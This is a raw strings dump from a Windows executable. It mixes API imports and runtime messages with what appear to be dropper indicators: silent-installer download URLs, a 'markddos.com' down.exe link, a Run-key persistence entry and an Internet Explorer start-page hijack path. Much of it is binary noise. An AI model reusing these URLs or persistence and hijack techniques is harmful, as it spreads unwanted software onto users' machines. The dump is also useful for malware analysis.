GetCurrentObject GetCurrentProcess GetCurrentThread GetCurrentThreadId GetCursorPos GetDesktopWindow GetDeviceCaps GetDIBits GetDlgCtrlID GetDlgItem GetEnvironmentStrings GetEnvironmentStringsW GetEnvironmentVariableA GetFileAttributesA GetFileSize GetFileTime GetFileTitleA GetFileType GetFocus GetForegroundWindow GetFullPathNameA GetKeyState GetLastActivePopup GetLastError GetLocalTime GetMenu GetMenuCheckMarkDimensions GetMenuItemCount GetMenuItemID GetMenuState GetMessageA GetMessagePos GetMessageTime GetModuleFileNameA GetModuleHandleA GetMonitorInfoA GetNextDlgTabItem GetObjectA GetOEMCP GetOpenFileNameA GetParent GetPolyFillMode GetProcAddress GetProcessHeap GetProcessVersion GetProfileStringA GetPropA GetROP2 GetSaveFileNameA GetScrollPos GetScrollRange GetStartupInfoA GetStdHandle GetStockObject GetStretchBltMode GetStringTypeA GetStringTypeW GetSubMenu GetSysColor GetSysColorBrush GetSystemMenu GetSystemMetrics GetSystemPaletteEntries GetSystemTime GetTabList GetTextColor GetTextExtentPoint32A GetTextMetricsA GetTickCount GetTimeZoneInformation GetTopWindow GetVersion GetVersionExA GetViewportExtEx GetViewportOrgEx GetVolumeInformationA GetWindow GetWindowDC GetWindowExtEx GetWindowLongA GetWindowOrgEx GetWindowPlacement GetWindowRect GetWindowTextA GetWindowTextLengthA (*.GIF)|*.GIF| GlobalAddAtomA GlobalAlloc GlobalDeleteAtom GlobalFindAtomA GlobalFlags GlobalFree GlobalGetAtomNameA GlobalHandle __GLOBAL_HEAP_SELECTED GlobalLock GlobalReAlloc GlobalSize GlobalUnlock GrayStringA `h```` h9n`u; HeapAlloc HeapCreate HeapDestroy HeapFree HeapReAlloc HeapSize hgjlkbrfzaoe HHtiHtGH HHtpHHtl H:mm:ss HrCg@b g HSVHWtgHHtF Ht#HHt HtHHt( HtHHuz HtOHt)H HtTHtFHt8Ht*Ht HTTP/1.0 http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000151945.exe http://dlsw.br.baidu.com/ditui/zujian/BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000151945.exe http://download.58611.net:8181/haozip_silent/haozip_silent_782130248.exe http://download.58611.net:8181/kuwo_silent/kuwo_silent_782130248.exe http://download.58611.net:8181/pic/pic_silent_782130248.exe http://download.58611.net:8181/pinyin/bdpinyin_silent_782130248.exe http://download.58611.net:8181/pps/pps_silent_782130248.exe http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_02134.exe http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782130248.exe http://d.union.ijinshan.com/duba/link/dscKAVSETUPS_66_130903.exe http://jifendownload.2345.cn/jifen_2345/2345explorer_k87648162.exe http://jifendownload.2345.cn/jifen_2345/2345haozip_k87648162.exe http://jifendownload.2345.cn/jifen_2345/2345pcsafe_k87648162.exe http://jifendownload.2345.cn/jifen_2345/lkfish_k87648162_332947.exe http://nb.cache.baidupcs.com/file/e15788e5a4a5bc4ccbd8acfccccddd3b?bkt=p2-qd-294&xcode=57d758161f66de706ccd294c1df1f083ad23dfac9bf6b2990b2977702d3e6764&fid=1801360174-250528-100554078920541&time=1427860893&sign=FDTAXERLBH-DCb740ccc5511e5e8fedcff06b081203-FFbapq2m6pKvQgf68PPDkIbWRiQ%3D&to=nbc&fm=Nan,B,M,ny&sta_dx=2&sta_cs=1&sta_ft=exe&sta_ct=0&newver=1&newfm=1&flow_ver=3&sl=80347212&expires=8h&rt=sh&r=417997622&mlogid=3844192640&vuk=137491712&vbdid=3540108374&fin=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe&fn=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe HttpOpenRequestA HttpQueryInfoA HttpSendRequestA http://u.dl.baofeng.com/upload/bdsBaofeng5%5B%5B1671_02134%5D%5D.exe http://www.2345.com/?k87648162 http://www.markddos.com:8555/down.exe hWj@_; _hypot (*.ICO)|*.ICO| #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS) #ifdef _WIN32 ImageList_Destroy #include "l.chs\afxres.rc" // Standard components InflateRect InitCommonControlsEx InitializeCriticalSection InterlockedDecrement InterlockedExchange InterlockedIncrement InternetCanonicalizeUrlA InternetCloseHandle InternetConnectA InternetCrackUrlA InternetOpenA InternetReadFile InternetSetOptionA IntersectRect InvalidateRect iphlpapi.dll IQh0MH IQh8MH IQh<RH IsBadCodePtr IsBadReadPtr IsBadWritePtr IsChild IsDialogMessageA IsIconic IsRectEmpty IsWindow IsWindowEnabled IsWindowVisible IsZoomed It#Iu% \$\}-j JanFebMarAprMayJunJulAugSepOctNovDec January jBWVSSQ JPEGMEM (*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG (*.JPG)|*.JPG|BMP j VUPWQ KERNEL32 Kernel32.dll KERNEL32.dll KillTimer kXEQ>\u ^l_^][ ;l$ }: L$ ]_^ L$0PQR L$0PQS L$0SUV@W L23fff&ff L$,_^]3 L$,_[3 L$4_^3 L$4_^[d L$4S+L$0Qj L$4UQWP L$4VQUP L$4WPQR L$4WQUVS L$8^]_3 L$8_^][d L$8WPQR LANGUAGE 4, 2 LCMapStringA LCMapStringW L$`_^][d L$|_^][d L$ ^][d L$ _^d L$ _^][d L$,_^][d L$(_^][d L$@^[d L$@_^][d L$$^[d L$$^]d L$$_^d L$$_^][d L$\_^][d L$D_^[d L$D_^][d L$D_]d L$DPQj L$DSVQ LeaveCriticalSection l g~b0R l g~b0Rdk L$h_^]3 L$h_^][d L$H_^][d L$H][d L$Hj&Q l$HQRVU L$HSUVWP L$$hxOH LineTo L$L_^]3 L$l_^][d L$L^[d L$L_^][d L$LPQR L$lRVQ LoadBitmapA LoadCursorA LoadIconA LoadImageA LoadLibraryA LoadResource LoadStringA LocalAlloc LocalFree LocalReAlloc LockFile LockResource L$P_^d L$P_]^[d L$ PQh L$(PQR L$@PQR L$<PQVV L$pRPQ LPtoDP L$(PVQ L$ QSR L$,RPQ L$(RPQ L$<RPQW L$@RQj L$@RUQ L$<SQR lstrcatA lstrcmpA lstrcmpiA lstrcpyA lstrcpynA lstrlenA L$,SUV L$(SUV L$T_^] L$t_^d L$t][d L$T_^]d L$T_^][d |$LtE; L$TSWQ L$(UUh \$lUV3 L$(VQRSP L$(VQVj l$@VW3 l$<VWj L$ WPQ L$(WQR L$(WSR L$X_^]3 L$x_^d L$x_^][d L$X_^d L$X;L$ L$XSQh @;l$\~Z mailto: MapWindowPoints M/d/yy MessageBoxA MGridCells Microsoft Visual C++ Runtime Library midiOutPrepareHeader midiOutReset midiOutUnprepareHeader midiStreamClose midiStreamOpen midiStreamOut midiStreamProperty midiStreamRestart midiStreamStop (*.MID)|*.MID| MIME-Version: 1.0 ModifyMenuA Monday MonitorFromPoint MonitorFromRect MonitorFromWindow MoveToEx MoveWindow Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Mpr.dll MPR.dll MS Sans Serif MS Shell Dlg __MSVCRT_HEAP_SELECT MulDiv MultiByteToWideChar n0SSSSU -NbkSbpS -NbkSbpS( nd9~dt N/f@b g NH_^][ Nh;NX| -N"N1Y N*Ncktepe N*Ntepe N*N(W% N*N(W0 - not enough space for arguments - not enough space for environment - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November nt2Ht#Ht NTRPQj (null) N$~ WU NX9NXu Nyt2S W w w nzzpenc O(_^][ o0SSSSU October offffff OffsetRect OffsetViewportOrgEx O hP"J ole32.dll OLEAUT32.dll OleInitialize OleUninitialize OpenClipboard OpenDatabase OpenPrinterA O(uckHr out.prn OX[0R ~P9~Pun PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PA#define _AFX_NO_SPLITTER_RESOURCES PatBlt PathToRegion .PAVCArchiveException@@ .PAVCException@@ .PAVCFileException@@ .PAVCMemoryException@@ .PAVCNotSupportedException@@ .PAVCObject@@ .PAVCResourceException@@ .PAVCSimpleException@@ .PAVCUserException@@ PeekMessageA Ph_^][Y P#include "afxres.h" PostMessageA PostQuitMessage PPPPhd PPPPPPPP P<PuWSV ppxxxx PQj WUS PQQQQQ \$ PQV #pragma code_page(936) PreviewPages (*.prn)|*.prn| Program: <program name unknown> P$RWPh ~'PSQR PtInRect PtVisible - pure virtual function call @PVj,S \$PVUUS PWVWWW QPSWVR QQSVW3 QQSVWd QQSVWj QQUWSS QRWh`RH QSh BH QSUVWj QX[gbL RaiseException RASAPI32.dll RasGetConnectStatusA RasHangUpA `.rdata ReadFile RealizePalette Rectangle RectVisible RedrawWindow RegCloseKey RegCreateKeyA RegCreateKeyExA RegisterClassA RegisterClipboardFormatA RegisterWindowMessageA RegOpenKeyExA RegQueryValueA RegSetValueExA ReleaseCapture ReleaseDC ReleaseSemaphore RemovePlayer RemovePropA Reply-To: %s resource.h RestoreDC ResumeThread RoundRect |$,RPQ RSbpS\O RtlUnwind runtime error Runtime Error! RVPUSQ RWh`NH Saturday SaveDC SbpS0R SbpS@b gu SbpS:g: SbpS\O ScaleViewportExtEx ScaleWindowExtEx ScreenToClient ScrollWindowEx SelectClipRgn SelectObject SelectPalette SendDlgItemMessageA SendMessageA September SetActiveWindow SetBkColor SetBkMode SetCapture SetClipboardData SetCurrentDirectoryA SetCursor SetCursorPos SetEndOfFile SetEnvironmentVariableA SetErrorMode SetEvent SetFilePointer SetFocus SetForegroundWindow SetHandleCount SetLastError SetMapMode SetMenu SetMenuItemBitmaps SetParent SetPolyFillMode SetPropA SetRect SetRectEmpty SetROP2 SetScrollPos SetScrollRange SetStdHandle SetStretchBltMode SetTextColor SetTimer Settings SetUnhandledExceptionFilter SetViewportExtEx SetViewportOrgEx SetWindowExtEx SetWindowLongA SetWindowOrgEx SetWindowPos SetWindowRgn SetWindowsHookExA SetWindowTextA Shell32.dll SHELL32.dll ShellExecuteA Shell_NotifyIconA \shell\open\command Shift+F1 Shift+F10 Shift+F11 Shift+F12 Shift+F2 Shift+F3 Shift+F4 Shift+F5 Shift+F6 Shift+F7 Shift+F8 Shift+F9 SHLWAPI.dll ShowWindow SING error sO;>|C;~ software Software\ Software\Microsoft\Internet Explorer\Main\Start Page software\microsoft\windows\CurrentVersion\Run\sbds %s <%s> SS@SSPVSS _SSSSU StartDocA StartPage StretchBlt Subject: %s Sunday SunMonTueWedThuFriSat SWVVVRPV System SystemParametersInfoA T$0h$OH T$0PQR T$0RPQ T$0SUV @t4Ht1Ht_Ht T$8h$TH T$8QRP T$8RWj t$ 90t t 9p$u t&9^$t TabbedTextOutA T$$+D$4 tD9_Pt? T$DhPAH T$dPQR T$DPQRW T$DQRU T$DQSR T$Du f T$DWRh T$\;D$Xu TerminateProcess TextOutA T/f&Tcknx <]t_G<-uA t{h(BH !This program cannot be run in DOS mode. t>Ht Ht t+Ht$Ht Thursday T$H} VP tI;Ftr T$\jdSR +tJHt:Ht* TLOSS error T$lPRh TlsAlloc TlsFree TlsGetValue TlsSetValue t$LUPh T$LWUQVR tn<%t2 tooltips_class32 To: %s T$pPQR t$PPVS T$(PQR T$\PQR T$PQRP T$ PQWWR T$$PRV tq9~Dt T$(Qh@ T$ QRP T$(QVURWP TranslateAcceleratorA TranslateMessage tRHt}H T$,RQP t%RSQP t$$RVP T$<RVW tS9~@uN T$ SRh T$,SRh t$(SSh t#SSUP T$ SWRP +ttHHtd t.;t$$t( Tuesday T$\URP t$$VSS tvWWWWU T$\WVR t/WWUPj (*.txt)|*.txt| T$XUSR ;t$Xu";\$\u t$XWVS tYhpTH ?u='@^ u._^][ u29l$xu, u"8D$yu u]9B uX u 9~@u >:u#FV uh9^8uX u-hn6F ujhHOH - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error >:uNFV UnhandledExceptionFilter UnhookWindowsHookEx UNLINK UnlockFile UnregisterClassA UpdateWindow uR9BxuM uRFGHt us-ascii USER32 user32.dll User32.dll USER32.dll u$SShe \$(UVW ValidateRect VC20XC00U V#D$,WPQ VERSION.dll Vh;VX| VirtualAlloc VirtualFree \$<VW3 VWh=6F VWtp9E V,_^[Y W9^du- WaitForInputIdle WaitForMultipleObjects WaitForSingleObject waveOutClose waveOutGetNumDevs waveOutOpen waveOutPause waveOutPrepareHeader waveOutReset waveOutUnprepareHeader waveOutWrite (*.WAV;*.MID)|*.WAV;*.MID|WAV (*.WAV)|*.WAV|MIDI Wednesday WG!2S( WideCharToMultiByte window WindowFromPoint windows WinExec WinHelpA WININET.dll WINMM.dll WINSPOOL.DRV WjdjdPQh Wj(_Wj |$$}$WP (wqt\HHtS WriteFile WritePrivateProfileStringA WS2_32.dll WSOCK32.dll wsprintfA WTWindow |$@ Wu wwwwvf wwwwvfo wwwwww wwwwwww wwwwwwww wwwwwwwww wwwwwwwwwwwwwwwwwwwwwwww XY[Z[] Y;5DlH YHYtLHt9 YX[(W _^][YY |z;^<}uWS